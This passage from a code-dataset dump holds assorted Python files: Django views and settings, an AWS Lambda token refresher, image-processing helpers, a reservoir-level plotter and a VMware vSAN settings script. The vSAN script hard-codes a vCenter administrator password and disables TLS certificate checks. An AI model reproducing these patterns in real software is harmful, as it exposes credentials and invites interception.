\"ON\"\nelse:\n DEBUG = \"FALSE\"\n\n# TIME ZONE VARIABLE\nTIME_ZONE = os.environ.get(\"TIME_ZONE\", \"America/Mexico_City\")\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"309827667","text":"import datetime\n\n\ndef json_serializer(obj):\n \"\"\"Сериализация объекта в JSON с учётом специфических типов данных.\n\n Args:\n obj (str|None): Объект на входе.\n \"\"\"\n if isinstance(obj, (datetime.datetime, datetime.date)):\n obj = obj.isoformat()\n else:\n obj = str(obj)\n\n return obj\n","sub_path":"project/shortcuts/json_serializer.py","file_name":"json_serializer.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"256413480","text":"from bs4 import BeautifulSoup\nimport requests\n\ndata = requests.get(r'https://fortnitestats.net/')\n\nsoup = BeautifulSoup(data.text, 'html.parser')\n\ntable = soup.find('table')\n\nfor row in soup.find_all('tr', {'class':'player-row'}):\n place = row.find_all('td')[0].text.strip()\n score = row.find_all('td')[6].text.strip()\n\n print(place, \" score: \", score)","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"357518109","text":"import matplotlib.pyplot as plt\nimport matplotlib.patches as mpatches\nimport numpy as np \nimport vtolParam as P\n\n\nclass vtolAnimation:\n '''\n Create satellite animation\n '''\n def __init__(self):\n # Used to indicate initialization\n self.flag_init = True\n \n # Initializes a figure and axes object\n self.fig, self.ax = plt.subplots()\n\n # Initializes a list object that will be used to contain\n # handles to the patches and line objects.\n self.handle = []\n \n plt.axis([0*P.length, 2.0*P.length, 0*P.length,\n 2.0*P.length])\n plt.plot([-2.0*P.length, 2.0*P.length], [0, 0], 'b--')\n self.length = P.length\n self.width = P.width\n self.radius = P.radius\n self.w = P.w\n self.h = P.h\n \n \n def update(self, state):\n # Process inputs to function\n zt = state.item(0) # target\n zv = state.item(1) #Horizontal position \n h = state.item(2) #verticle position \n theta = state.item(3) # angle of arm, rad\n\n \n \n self.drawtarget(zt,h)\n self.drawbody(zv,h)\n self.drawwing1(zv,h,theta)\n self.drawwing2(zv,h,theta)\n self.drawarm1(zv,h,theta)\n self.drawarm2(zv,h,theta)\n self.ax.axis('equal')\n \n # Set initialization flag to False after first call\n if self.flag_init == True:\n self.flag_init = False\n\n#––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––––\n \n def drawtarget(self, zt,h):\n # specify bottom left corner of rectangle\n x = zt-P.w/2.0\n y = 0\n corner = (x, y)\n # create rectangle on first call, update on subsequent calls\n if self.flag_init == True:\n # Create the Rectangle patch and append its handle\n # to the handle list\n self.handle.append(\n mpatches.Rectangle(corner, P.w, P.h,\n fc = 'red', ec = 'black'))\n # Add the patch to the axes\n self.ax.add_patch(self.handle[0])\n else:\n self.handle[0].set_xy(corner) # Update patch \n\n def drawbody(self, zv,h):\n # specify bottom left corner of rectangle\n x = zv-P.w/2.0\n y = h-P.h/2.0\n corner = (x, y)\n # create rectangle on first call, update on subsequent calls\n if self.flag_init == True:\n # Create the Rectangle patch and append its handle\n # to the handle list\n self.handle.append(\n mpatches.Rectangle(corner, P.w, P.h,\n fc = 'blue', ec = 'black'))\n # Add the patch to the axes\n self.ax.add_patch(self.handle[1])\n else:\n self.handle[1].set_xy(corner) # Update patch\n \n \n def drawwing1(self, zv,h,theta):\n # specify center of circle\n x = zv+((P.radius+P.d)*(np.sin(theta)))\n y = h+((P.radius+P.d)*(np.cos(theta)))\n center = (x,y)\n # create circle on first call, update on subsequent calls\n if self.flag_init == True:\n # Create the CirclePolygon patch and append its handle\n # to the handle list\n self.handle.append(\n mpatches.CirclePolygon(center, radius=P.radius,\n resolution=15, fc='limegreen', ec='black'))\n # Add the patch to the axes\n self.ax.add_patch(self.handle[2])\n else:\n self.handle[2]._xy = center\n\n def drawwing2(self, zv,h,theta):\n # specify center of circle\n x = zv-(P.radius+P.d)*np.sin(theta)\n y = h-(P.radius+P.d)*np.cos(theta)\n center = (x,y)\n # create circle on first call, update on subsequent calls\n if self.flag_init == True:\n # Create the CirclePolygon patch and append its handle\n # to the handle list\n self.handle.append(\n mpatches.CirclePolygon(center, radius=P.radius,\n resolution=15, fc='limegreen', ec='black'))\n # Add the patch to the axes\n self.ax.add_patch(self.handle[3])\n else:\n self.handle[3]._xy = center\n\n def drawarm1(self, zv,h,theta):\n # specify x-y points of the rod\n X = [zv, zv+P.d*np.sin(theta)]\n Y = [h, h+P.d*np.cos(theta)]\n # create rod on first call, update on subsequent calls\n if self.flag_init == True:\n # Create the line object and append its handle\n # to the handle list.\n line, =self.ax.plot(X, Y, lw=1, c='black')\n self.handle.append(line)\n else:\n self.handle[4].set_xdata(X)\n self.handle[4].set_ydata(Y)\n \n def drawarm2(self, zv,h,theta):\n # specify x-y points of the rod\n X = [zv, (zv-P.d*np.sin(theta))]\n Y = [h, (h-P.d*np.cos(theta))]\n # create rod on first call, update on subsequent calls\n if self.flag_init == True:\n # Create the line object and append its handle\n # to the handle list.\n line, =self.ax.plot(X, Y, lw=1, c='black')\n self.handle.append(line)\n else:\n self.handle[5].set_xdata(X)\n self.handle[5].set_ydata(Y)","sub_path":"Simulation model/hw2/vtolAnimation.py","file_name":"vtolAnimation.py","file_ext":"py","file_size_in_byte":5551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"89801748","text":"from django.shortcuts import render,get_object_or_404\nfrom django.template import loader\n# Create your views here.\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom .models import Question\nfrom django.urls import reverse\ndef index(request):\n latest_question_list = Question.objects.order_by('-pub_date')[:5]\n template = loader.get_template('poems/index.html')\n context = {\n 'latest_question_list': latest_question_list,\n }\n return HttpResponse(template.render(context, request))\ndef detail(request, question_id):\n question=get_object_or_404(Question,pk=question_id);\n return render(request, 'poems/detail.html', {'question': question})\ndef results(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n return render(request, 'poems/results.html', {'question': question})\ndef vote(request, question_id):\n question=get_object_or_404(Question,pk=question_id);\n try:\n selected_choice=question.choice_set.get(pk=request.POST['choice'])\n except (KeyError,Choice.DoesNotExist):\n return render(request,'poems/detail.html',{\n 'question':question,\n 'error_message':\"You didn't select a choice.\",\n })\n else:\n selected_choice.votes+=1;\n selected_choice.save();\n return HttpResponseRedirect(reverse('poem:results',args=(question_id,)))","sub_path":"pReader/poem/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"450261788","text":"\"\"\"This file override some base settings and add new, for local needments.\"\"\"\nfrom . base import * # noqa\nfrom . base import env\n\n\nDEBUG = True\n# ------------------------------------------------------------------------\n\nSECRET_KEY = env(\"DJANGO_SECRET_KEY\",\n default=\"sdklfgjLKklj1lkjJLLhilhHOIho098HhhoihggpPghpgh\")\n# ------------------------------------------------------------------------\n\n# A list of strings represnting the host/domain names that this Django site can\n# serve. This is security measure to prevent HTTP header attacks, which are\n# possible even many seemingly-save web server configuration.\n#\n# Default [] (Empty list).\n#\nALLOWED_HOSTS = [\"localhost\", \"127.0.0.1\", \"0.0.0.0\"]\n# ------------------------------------------------------------------------\n\n# A dictionary containing the settings for all caches to be used with Django.\n# It is a nested dictionary whose contents maps cache aliases to a dictionary\n# containing the options for an individual cache.\n#\n# Default {\n# \"default\": {\n# \"BACKEND\": \"django.core.cache.backends.locmem.LocMemCache\",\n# }\n#\nCACHES = {\n \"default\": {\n \"BACKEND\": \"django.core.cache.backends.locmem.LocMemCache\",\n \"LOCATION\": \"\",\n }\n}\n# ------------------------------------------------------------------------\n\n# =================\n# django-debug-toolbar\n# =================\n\n# The Django Debug Toolbar is a configurable set of panels that display various\n# debug information about the cuttent request/response.\n#\n# INSTALLED_APPS += [\"debug_toolbar\"] # noqa\n# ------------------------------------------------------------------------\n\n# MIDDLEWARE += [\"debug_toolbar.middleware.DebugToolbarMiddleware\"] # noqa\n# ------------------------------------------------------------------------\n\n# DEBUG_TOOLBAR_CONFIG = {\n# \"DISABLE_PANELS\": [\"debug_toolbar.panels.redirect.RedirectPanel\"],\n# \"SHOW_TEMPLATE_CONTEXT\": True,\n# }\n# ------------------------------------------------------------------------\n\n# INTERNAL_IPS = [\"127.0.0.1\", \"10.0.2.2\"]\n# ------------------------------------------------------------------------\n\n# =================\n# django-extensions\n# =================\n\n# Is a collection of custom extensions for Django Framework.\n# Include management commends, additional database fields, admin extensions...\n#\nINSTALLED_APPS += [\"django_extensions\"] # noqa\n","sub_path":"Python/Django/Django(Controllers)/RequestAndResponseObjects/config/settings/local.py","file_name":"local.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"108582110","text":"from lambdas.services import ForceApi\nfrom lambdas.exceptions import InvalidArgument\n\n\ndef lambda_handler(event, context):\n \"\"\"\n refreshes an access token with a refresh token with Salesforce\n :param event: {\n 'refresh_token': your refresh token\n 'client_id': your app client id\n 'client_secret': your app client secret\n }\n :param context: lambda context\n :return: new access token\n \"\"\"\n if 'refresh_token' not in event:\n raise InvalidArgument('You need a refresh_token in this function.')\n if 'client_id' not in event:\n raise InvalidArgument('You need a client_id in this function.')\n if 'client_secret' not in event:\n raise InvalidArgument('You need a client_secret in this function.')\n\n api = ForceApi(event['client_id'], event['client_secret'])\n response = api.refresh_access_token(event['refresh_token'])\n if 'error' in response:\n return {\n 'error': response['error_description']\n }\n else:\n return response\n\n\n","sub_path":"lambdas/refresh_access_token.py","file_name":"refresh_access_token.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"434420565","text":"################################################################################\n\n# functionality: functions for multi-scale sliding window (exhaustive) search\n\n# This version: (c) 2018 Toby Breckon, Dept. Computer Science, Durham University, UK\n# License: MIT License\n\n# Origin acknowledgements: forked from https://github.com/siphomateke/PyBOW\n\n################################################################################\n\nimport numpy as np\nimport cv2\n\n################################################################################\n\n# re-size an image with respect to its aspect ratio if needed.\n# used in the multi-scale image pyramid approach\n\ndef resize_img(img, width=-1, height=-1):\n if height == -1 and width == -1:\n raise TypeError(\"Invalid arguments. Width or height must be provided.\")\n h = img.shape[0]\n w = img.shape[1]\n if height == -1:\n aspect_ratio = float(w) / h\n new_height = int(width / aspect_ratio)\n return cv2.resize(img, (width, new_height))\n elif width == -1:\n aspect_ratio = h / float(w)\n new_width = int(height / aspect_ratio)\n return cv2.resize(img, (new_width, height))\n\n################################################################################\n\n# a very basic approach to produce an image at multi-scales (i.e. variant\n# re-sized resolutions)\n\ndef pyramid(img, scale=1.5, min_size=(30, 30)):\n # yield the original image\n yield img\n\n # keep looping over the pyramid\n while True:\n # compute the new dimensions of the image and resize it\n w = int(img.shape[1] / scale)\n img = resize_img(img, width=w)\n\n # if the resized image does not meet the supplied minimum\n # size, then stop constructing the pyramid\n if img.shape[0] < min_size[1] or img.shape[1] < min_size[0]:\n break\n\n # yield the next image in the pyramid\n yield img\n\n################################################################################\n\n# generate a set of sliding window locations across the image\n\ndef sliding_window(image, window_size, step_size=8):\n # slide a window across the image\n for y in range(0, image.shape[0], step_size):\n for x in range(0, image.shape[1], step_size):\n # yield the current window\n window = image[y:y + window_size[1], x:x + window_size[0]]\n if not (window.shape[0] != window_size[1] or window.shape[1] != window_size[0]):\n yield (x, y, window)\n\n################################################################################\n\n# perform basic non-maximal suppression of overlapping object detections\n\ndef non_max_suppression_fast(boxes, overlapThresh):\n # if there are no boxes, return an empty list\n if len(boxes) == 0:\n return []\n\n # if the bounding boxes integers, convert them to floats --\n # this is important since we'll be doing a bunch of divisions\n if boxes.dtype.kind == \"i\":\n boxes = boxes.astype(\"float\")\n\n # initialize the list of picked indexes\n pick = []\n\n # grab the coordinates of the bounding boxes\n x1 = boxes[:, 0]\n y1 = boxes[:, 1]\n x2 = boxes[:, 2]\n y2 = boxes[:, 3]\n\n # compute the area of the bounding boxes and sort the bounding\n # boxes by the bottom-right y-coordinate of the bounding box\n area = (x2 - x1 + 1) * (y2 - y1 + 1)\n idxs = np.argsort(y2)\n\n # keep looping while some indexes still remain in the indexes\n # list\n while len(idxs) > 0:\n # grab the last index in the indexes list and add the\n # index value to the list of picked indexes\n last = len(idxs) - 1\n i = idxs[last]\n pick.append(i)\n\n # find the largest (x, y) coordinates for the start of\n # the bounding box and the smallest (x, y) coordinates\n # for the end of the bounding box\n xx1 = np.maximum(x1[i], x1[idxs[:last]])\n yy1 = np.maximum(y1[i], y1[idxs[:last]])\n xx2 = np.minimum(x2[i], x2[idxs[:last]])\n yy2 = np.minimum(y2[i], y2[idxs[:last]])\n\n # compute the width and height of the bounding box\n w = np.maximum(0, xx2 - xx1 + 1)\n h = np.maximum(0, yy2 - yy1 + 1)\n\n # compute the ratio of overlap\n overlap = (w * h) / area[idxs[:last]]\n\n # delete all indexes from the index list that have a significant overlap\n idxs = np.delete(idxs, np.concatenate(([last],\n np.where(overlap > overlapThresh)[0])))\n\n # return only the bounding boxes that were picked using the\n # integer data type\n return boxes[pick].astype(\"int\")\n\n################################################################################\n","sub_path":"sliding_window.py","file_name":"sliding_window.py","file_ext":"py","file_size_in_byte":4701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"387232024","text":"import lcra_gage_selenium as lcra\r\nimport pandas as pd\r\nimport numpy as np\r\nimport datetime\r\nimport os\r\n\r\n\r\ndef plot_travis_volume_since_1943(days_before_today=365):\r\n os.chdir(os.path.dirname(sys.argv[0]))\r\n # print(os.getcwd())\r\n df = pd.read_csv('Travis.08154500.1943-2018.csv', encoding='ISO-8859-1')\r\n df['Date'] = pd.to_datetime(df['Date'])\r\n df = df.set_index('Date')\r\n # date1 = '1943-01-01'\r\n # date2 = '2050-01-05'\r\n # date2 = '2050-12-31'\r\n date2 = datetime.date(year=2050, month=12, day=31)\r\n # get the difference in days between today and the last day in the csv read above (1/5/2018)\r\n dt_today = datetime.date.today()\r\n dt_last = datetime.date(year=2018, month=5, day=23)\r\n num_days = dt_today - dt_last\r\n # read elevation since 1/22/2018 and append to df\r\n x, y, full, header, latest_vals = lcra.import_gage_data(site_num='3963', full_level=681.0)\r\n # make a df\r\n df_new = pd.DataFrame({'Date': x, 'Level_ft': y}).set_index('Date')\r\n # df = df.append(df_new, ignore_index=True)\r\n df = df.append(df_new, ignore_index=False)\r\n # remove duplicate index rows\r\n df = df[~df.index.duplicated(keep='last')]\r\n # remove blank rows\r\n df = df.dropna(axis=0)\r\n # overwrite the source csv with updated data\r\n df.to_csv('Travis.08154500.1943-2018.csv')\r\n df = df.reset_index()\r\n # filter by date\r\n # get start date\r\n date1 = dt_today - datetime.timedelta(days=days_before_today)\r\n # print(str(date1) + ' to ' + str(dt_today))\r\n df = df[(df['Date'] >= pd.Timestamp(date1)) & (df['Date'] <= pd.Timestamp(date2))]\r\n # round to 2 decimals to match up with the stage-area-volume table\r\n df.Level_ft = df.Level_ft.round(2)\r\n x = df['Date'].values\r\n level_ft = df['Level_ft'].values\r\n header = 'Lake Travis (hydromet.lcra.org)'\r\n # read stage-storage\r\n df2 = pd.read_csv('stage.vol.travis.2dec.csv', encoding='ISO-8859-1')\r\n # chain together: merging the df's, setting the index to Date, and sorting by Date\r\n df3 = pd.merge(df, df2, left_on='Level_ft', right_on='ELEVATION').set_index('Date').sort_index()\r\n df3.to_csv('travis.csv', index=True)\r\n # pull out volume array and convert to % full\r\n pct_full = df3.VOL_ACFT.values / 1123478 * 100\r\n # make horizontal line at 100%\r\n pct100 = np.zeros(pct_full.shape[0]) + 100.0\r\n lcra.subplots(x, pct_full, header, 1, 1, latest_vals=None, full=pct100, show_axis_labels=True,\r\n ylabel='Percent Full (%)')\r\n lcra.plot()\r\n\r\n level100 = np.zeros(level_ft.shape[0]) + 681.0\r\n lcra.subplots(x, level_ft, header, 1, 1, latest_vals=latest_vals, full=level100, show_axis_labels=True,\r\n ylabel='Level (ft)')\r\n lcra.plot()\r\n\r\n\r\nif __name__ == '__main__':\r\n import sys\r\n\r\n if len(sys.argv) > 1:\r\n plot_travis_volume_since_1943(days_before_today=int(float(sys.argv[1])))\r\n else:\r\n try:\r\n dt_today = datetime.date.today()\r\n dt_first = datetime.date(year=1943, month=2, day=1)\r\n max_days = (dt_today - dt_first).days\r\n str_max_days = '\\nEnter number of days to plot (max={:,.0f}): '.format(max_days)\r\n numdays = int(float(input(str_max_days)))\r\n if numdays < 1:\r\n raise ValueError('You entered {}. Number must be positive.'.format(numdays))\r\n plot_travis_volume_since_1943(days_before_today=numdays)\r\n except Exception as e:\r\n print('\\n' + str(e) + '\\n')\r\n # using 'input' keeps the command window open so the user can view the error\r\n input('press enter to exit...')\r\n","sub_path":"Res.Volume.1943.LCRAgage.py","file_name":"Res.Volume.1943.LCRAgage.py","file_ext":"py","file_size_in_byte":3635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"131752922","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 29 23:36:46 2016\n\n@author: maurizio\n\"\"\"\n\nimport sys\nthis_path = '/home/maurizio/GitBook/Library/mau21710/gli-appunti/python/' # path \nsys.path.append(this_path)\n\nimport os.path\nimport subprocess\nfrom funAsciidoc import generate_simple_table\ntry:\n from funTTS import create_mp3\nexcept ImportError:\n print ('ImportError for create_mp3')\ntry:\n #from funBlender import create_scene\n from funBlender import put_images_on_sequencer\n from funBlender import put_sounds_on_sequencer\n pass\nexcept ImportError:\n print ('ImportError for create_scene and put_images_on_sequencer')\n\n\n\n\ndef _tested():\n title = 'Stretching'\n txt_commands = \"arco_plantare 20x2, gambe_posteriore 20x2, popliteo 20x2, adduttori 20x2, quadricipiti 20x2, anche 20x2, base_tronco_e_glutei 20, dorso 20, collo 20, pettorali 20x2, spalle 20x2, braccia 20x2\"\n base_path = '/home/maurizio/GitBook/Library/mau21710/gli-appunti' # path \n orig_imgs=\"figures/stretching/\"\n ext=\".png\"\n dest_ext=\".jpg\"\n out_dir = \"/tmp/aaa\"\n start_sound=\"/home/maurizio/Mao/Progetti/Suoni/gesso.mp3\"\n background_music=\"/home/maurizio/Downloads/Audio/relax-ben.mp3\"\n orig_svg_dir = os.path.join(base_path,\"figures\")\n lista_titoli = ['head_titles.svg', 'tail_titles.svg']\n lista_titoli_png = ['head_titles.png', 'tail_titles.png']\n dest_img_format = '960x720'\n lista_sostituzioni = [\n ['esteso', 'stretching post corsa'],\n #['mau21710', 'nome autore'],\n ['fitness', 'stretching'],\n ['Durata: 0 min', 'Durata: 30 min'],\n ['titolo_sequenza', 'Post Running'],\n ['thanks for watching!', 'grazie per l\\'attenzione'],\n ]\n absolute_orig_images = os.path.join(base_path,orig_imgs)\n if not os.path.exists(out_dir):\n subprocess.call(['mkdir', out_dir]) \n # ------------------------------ Generazione Header e Footer\n for l in lista_titoli:\n orig = os.path.join(orig_svg_dir, l)\n dest = os.path.join(out_dir,l)\n dest_png = os.path.join(absolute_orig_images,lista_titoli_png[lista_titoli.index(l)])\n if not os.path.exists(dest_png): #If already made no need to do it again!\n subprocess.call(['cp', orig, dest])\n f = open(dest,'r')\n all_svg=f.read()\n f.close()\n for l in lista_sostituzioni:\n all_svg = all_svg.replace(l[0],l[1])\n f = open(dest,'w')\n all_svg=f.write(all_svg)\n f.close() \n subprocess.call(['convert', '-scale', dest_img_format, dest, dest_png])\n # --------------------------------------------------------------------------- Genero Tabelle\n images, descs, secs, adoc_table = generate_simple_table(title, txt_commands, orig_imgs, ext)\n # ---------------------------------------------------------------------------- File Audio \n mp3_files = []\n tmp = os.path.join(out_dir,'tmp.mp3')\n for i in range(len(descs)):\n mp3_name=os.path.join(out_dir, \"{:03d}_{}.mp3\".format(i,images[i]))\n mp3_files.append(mp3_name)\n if not os.path.exists(mp3_name): #If already made no need to do it again!\n create_mp3(descs[i],mp3_name)\n subprocess.call(['sox', start_sound, mp3_name, tmp])\n subprocess.call(['mv', tmp, mp3_name])\n mp3_files.append(start_sound)\n mp3_files.append(start_sound)\n mp3_files.append(background_music)\n # ----------------------------------- Generazione lista files grafici\n imagefile_names = [lista_titoli_png[0]]\n for i in images:\n imagefile_names.append(\"{}{}\".format(i,ext))\n imagefile_names.append(lista_titoli_png[1])\n secs_full = [10]\n secs_full.extend(secs)\n secs_full.append(10)\n #-------------------------------------- genero i trunk video\n converted_images=[]\n for img in imagefile_names:\n new_name = os.path.join(out_dir,os.path.basename(img)).replace(ext, dest_ext)\n if not os.path.exists(new_name):\n subprocess.call(['convert', '-transparent-color', 'white', \n '-flatten' , '-scale', \n dest_img_format, os.path.join(absolute_orig_images,img), \n new_name])\n converted_images.append(new_name)\n put_images_on_sequencer(converted_images,\"\",secs_full)\n put_sounds_on_sequencer(mp3_files,\"\",secs_full)\n \n\nif __name__ == \"__main__\":\n _tested()\n pass\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n\n","sub_path":"_site/python/genera_stretching.py","file_name":"genera_stretching.py","file_ext":"py","file_size_in_byte":4778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"399019038","text":"\"\"\"empty message\n\nRevision ID: fdb1ed08ff70\nRevises: 641fa5fba3e1\nCreate Date: 2021-11-03 10:36:30.408197\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'fdb1ed08ff70'\ndown_revision = '641fa5fba3e1'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('todolists', sa.Column('completed', sa.Boolean(), nullable=False))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('todolists', 'completed')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/fdb1ed08ff70_.py","file_name":"fdb1ed08ff70_.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"448301762","text":"from __future__ import unicode_literals\nfrom django.db import models\n\nclass ShowManager(models.Manager):\n def basic_validator(self, postData):\n errors = {}\n # Setting length requirements\n if len(postData['title']) < 2:\n errors[\"show_title\"] = \"Title should be at least 2 caracters\"\n if len(postData['network']) < 3:\n errors[\"network\"] = \"Network name shoud be at least 3 caracter\"\n if len(postData['decription']) < 10:\n errors[\"decription\"] = \"Descriptions should be al least 10 characters\"\n return errors\n# creating the table\nclass Shows(models.Model):\n title = models.CharField(max_length=255)\n network = models.CharField(max_length=255)\n release_date = models.DateField(null=True)\n decription = models.TextField(null=True)\n created_at = models.DateTimeField(auto_now_add=True)\n updated_at = models.DateTimeField(auto_now=True)\n objects = ShowManager()\n\n def __repr__(self):\n return f\" str:\n list_of_days = [\n \"Saturday\",\n \"Sunday\",\n \"Monday\",\n \"Tuesday\",\n \"Wednesday\",\n \"Thursday\",\n \"Friday\",\n ]\n if month == 1 or month == 2:\n year = year - 1\n month = month + 12\n y = year % 100\n c = year // 100\n weekday = int((day + 13 * (month + 1) // 5 + y + y // 4 + c // 4 + 5 * c) % 7)\n required_day = list_of_days[weekday]\n return required_day\n","sub_path":"code/ch17/17.3.2.dayOfTheWeek.py","file_name":"17.3.2.dayOfTheWeek.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"500088828","text":"from pyVim.connect import SmartConnect, Disconnect\nfrom pyVmomi import Cache\nimport ssl\nimport atexit\nfrom pyVmomi import vim\n# import the VSAN API python bindings\n\n#import the vSAN API python bindings\n\nimport vsanmgmtObjects\nimport vsanapiutils\n\ns = ssl.SSLContext(ssl.PROTOCOL_TLSv1)\ns.verify_mode = ssl.CERT_NONE\n\n# connection string to connect to vCenter\n\nsc = SmartConnect(host='10.27.44.44', user='Administrator@vsphere.local', pwd='VMware123!', sslContext=s)\n\n# Datacenter Level\n\ndc = sc.content.rootFolder.childEntity[0]\n\n\n\n\n\n# Find by Child Method to retrive hosts\n# retrieves all the hosts from the DC\n\nhosts = sc.content.rootFolder.childEntity[0].hostFolder.childEntity[0].host\n\nprint(hosts)\nprint(hosts[0])\n\nprint(hosts[0].configManager.advancedOption)\n\nadvsetting = hosts[0].configManager.advancedOption.setting\n\n# setting is type array\n\n# Loop over all the settings and look for vSAN CLomd Repair Time\n\n\n\n\n\nfor i in advsetting:\n\n if i.key == \"VSAN.ClomRepairDelay\":\n\n print(i.key)\n print(i.value)\n print(sc.content.rootFolder.childEntity[0].hostFolder.childEntity[0].host[0].configManager.advancedOption.QueryOptions('VSAN.ClomRepairDelay'))\n repair = sc.content.rootFolder.childEntity[0].hostFolder.childEntity[0].host[0].configManager.advancedOption.QueryOptions('VSAN.ClomRepairDelay')\n\n changedValue = repair[0]\n changedValue.key = 'VSAN.ClomRepairDelay'\n changedValue.value = '120'\n bn = vim.option.OptionValue(key='VSAN.ClomRepairDelay', value=120)\n print(bn)\n\n\n# creio que tenho erro devido a estar dentro do loop\n# TypeError: 'vim.option.OptionValue'\n# object is not iterable\n# rever isto\n\n sc.content.rootFolder.childEntity[0].hostFolder.childEntity[0].host[0].configManager.advancedOption.UpdateOptions(bn)\n\n\n\natexit.register(Disconnect, sc)\n","sub_path":"vSAN-Change-Adv-Settings.py","file_name":"vSAN-Change-Adv-Settings.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"644682894","text":"import sys\nfrom os import path\nfrom PIL import Image, ImageDraw\n\n# Endereco da imagem\nimagem = sys.argv[1]\n\n# Abre a imagem original em modo tons de cinza\norigem = Image.open(imagem).convert('L')\n\n# Cria a imagem a ser erodida\nerodida = Image.new('L', (origem.width, origem.height))\nerodidaDraw = ImageDraw.Draw(erodida)\n\nestruturante = (\n (0, 255, 0),\n (255, 255, 255),\n (0, 255, 0)\n)\n\n# Efetua erosao na imagem original a partir do elemento estruturante\nfor x in range(1, origem.width - 1):\n for y in range(1, origem.height - 1):\n centro = origem.getpixel((x, y))\n\n if centro != estruturante[1][1]:\n continue\n\n if \\\n (origem.getpixel((x - 1, y - 1)) == estruturante[0][0] or estruturante[0][0] == 0) and \\\n (origem.getpixel((x, y - 1)) == estruturante[0][1] or estruturante[0][1] == 0) and \\\n (origem.getpixel((x + 1, y - 1)) == estruturante[0][2] or estruturante[0][2] == 0) and \\\n (origem.getpixel((x - 1, y)) == estruturante[1][0] or estruturante[1][0] == 0) and \\\n (origem.getpixel((x + 1, y)) == estruturante[1][2] or estruturante[1][2] == 0) and \\\n (origem.getpixel((x - 1, y + 1)) == estruturante[2][0] or estruturante[2][0] == 0) and \\\n (origem.getpixel((x, y + 1)) == estruturante[2][1] or estruturante[2][1] == 0) and \\\n (origem.getpixel((x + 1, y + 1)) == estruturante[2][2] or estruturante[2][2] == 0):\n erodidaDraw.point((x, y), 255)\n\n# Cria a imagem de destino\ndestino = Image.new('L', (origem.width, origem.height))\ndestinoDraw = ImageDraw.Draw(destino)\n\n# Efetua a diferenca de conjuntos entre a imagem original e a imagem erodida\nfor x in range(origem.width):\n for y in range(origem.height):\n if origem.getpixel((x, y)) == 255 and erodida.getpixel((x, y)) == 0:\n destinoDraw.point((x, y), 255)\n else:\n destinoDraw.point((x, y), 0)\n\n# Salva a imagem\nnome, ext = path.splitext(imagem)\ndestino.save(nome + '_contorno' + ext)\n","sub_path":"ExtracaoContorno.py","file_name":"ExtracaoContorno.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"34093831","text":"def read_file(filename):\r\n lines=[]\r\n with open(filename , \"r\" , encoding=\"utf-8-sig\") as f:\r\n for line in f:\r\n lines.append(line.strip())\r\n return lines\r\n\r\ndef convert(lines):\r\n new = []\r\n person = None\r\n chien_word_count = 0\r\n china_word_count = 0\r\n for line in lines: \r\n s = line.split(\" \")\r\n time = s[0]\r\n name = s[1]\r\n if name == \"孟淳\":\r\n for msg in s[2:]:\r\n china_word_count += len(msg)\r\n elif name == \"孟謙\":\r\n for msg in s[2:]:\r\n chien_word_count += len(msg)\r\n print(s)\r\n print(\"孟淳說了\",china_word_count,\"個字\")\r\n print(\"孟謙說了\",chien_word_count,\"個字\")\r\n # return new\r\n\r\n\r\ndef write_file(filename , lines):\r\n with open(filename , \"w\" ) as f:\r\n for line in lines:\r\n f.write(line + \"\\n\")\r\n\r\ndef main():\r\n lines = read_file(\"[LINE]孟淳.txt\")\r\n lines = convert(lines)\r\n # write_file(\"output.txt\", lines)\r\n\r\nmain()\r\n","sub_path":"line.chat.py","file_name":"line.chat.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"310150313","text":"class TestBench_efpm_point_multiplier(TB_aluEC_prime_ext):\n\n def add_point_multiplication(self, dp, P, n, R):\n self.add_action( \"func(\" + dp.ec2_point_to_vhdl_string(P) + \", -- P\" )\n self.add_action( \" \" + dp.Fp_element_to_vhdl_string(n) + \", -- n\" )\n self.add_action( \" \" + 